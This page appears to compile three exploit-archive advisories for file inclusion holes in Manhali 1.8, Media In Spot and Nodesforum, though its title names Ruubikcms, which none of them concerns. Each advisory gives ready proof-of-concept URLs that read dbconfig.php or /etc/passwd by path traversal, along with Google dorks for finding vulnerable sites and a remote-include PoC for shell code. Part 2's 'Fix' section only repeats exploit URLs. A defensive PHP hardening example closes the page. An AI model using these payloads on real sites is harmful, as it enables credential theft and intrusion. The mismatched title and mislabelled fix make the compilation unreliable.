Ruubikcms v 1.1.0 File Inclusion Flaw and Fix (3 Selected Articles)
Part 1: Ruubikcms v 1.1.0 File Inclusion Flaw and Fix
Title: Manhali v1.8 Local File Inclusion Vulnerability
Author: L0n3ly-H34rT (l0n3ly_h34rt@hotmail.com)
Vendor: www.manhali.com/
Download: sourceforge.net/projects/manhali/files/manhali_1.8.zip/download
Affected version: 1.8 (older versions may also be affected; not checked)
Tested on: Linux/Windows
############################################
# P.O.C :
/manhali/includes/download.php?f=../includes/dbconfig.php
############################################
# Greetz to my friendz
Part 2: Ruubikcms v 1.1.0 File Inclusion Flaw and Fix
#Date : May,16
#Vendor Url : http://www.mediainspot.com/
#Dork: "Powred By Media In Spot"
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
Part 3: Ruubikcms v 1.1.0 File Inclusion Flaw and Fix
# Google Dork: inurl: powered by Nodesforum
# Date: 6/23/
# Author: bd0rk ( bd0rk[at]hackermail.com )
# Software-Download: home.nodesforum.com/download?file=nodesforum_1.059_with_bbcode_1.004.zip
# Tested on: Ubuntu-Linux / WinVista
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code in 3rd_party_limits.php line 6 - 8
--------------------------------------------------------------------------------------------------------------
$limits_cache_url=$_nodesforum_code_path.'cache/'.$_nodesforum_db_table_name_modifier.'_3rd_party_limits.php';
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time()-(24*3600*14)))
{include($limits_cache_url);}
The variable $limits_cache_url is built from the other variable, $_nodesforum_code_path, so the included path can be controlled through that variable.
PoC: /nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]
Fixtip: Declare $_nodesforum_code_path, likewise!
Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)
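A hardened counterpart to the three patterns above (the `f=` download, the `page=` include, and an include prefix that the request can set), as an added example that is not code from Manhali, Media In Spot or Nodesforum. The function names, the `pages/` and `files/` directories and the sample files are assumptions made for illustration.

```php
<?php
// Added example; names, directories and sample files are hypothetical.

// Base path comes from the script location, never from request data.
define('APP_ROOT', __DIR__);

// ?page= style includes: the request picks a key, the server owns the file name.
function page_file(string $page): ?string
{
    $pages = ['home' => 'home.php', 'about' => 'about.php']; // constructed
    return isset($pages[$page]) ? APP_ROOT . '/pages/' . $pages[$page] : null;
}

// ?f= style downloads: resolve the path, then require it stays in $baseDir.
function resolve_inside(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($requested, "\0") !== false) {
        return null;
    }
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null; // missing, not a regular file, or a URL
    }
    // Compare with a trailing separator so "files-old" cannot match "files".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null; // "../" or a symlink resolved outside the base directory
    }
    return $real;
}

// Constructed files in a temporary directory to exercise both functions.
$tmp = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir($tmp . '/files', 0700, true);
file_put_contents($tmp . '/files/manual.txt', 'sample');
file_put_contents($tmp . '/dbconfig.php', '<?php // constructed secret');

$cases = ['manual.txt', '../dbconfig.php', 'http://example.invalid/x.txt'];
foreach ($cases as $f) {
    $r = resolve_inside($tmp . '/files', $f);
    echo str_pad($f, 32), $r === null ? 'rejected' : 'served', PHP_EOL;
}
foreach (['about', '../../etc/passwd'] as $p) {
    echo str_pad($p, 32), page_file($p) === null ? 'rejected' : 'included', PHP_EOL;
}
```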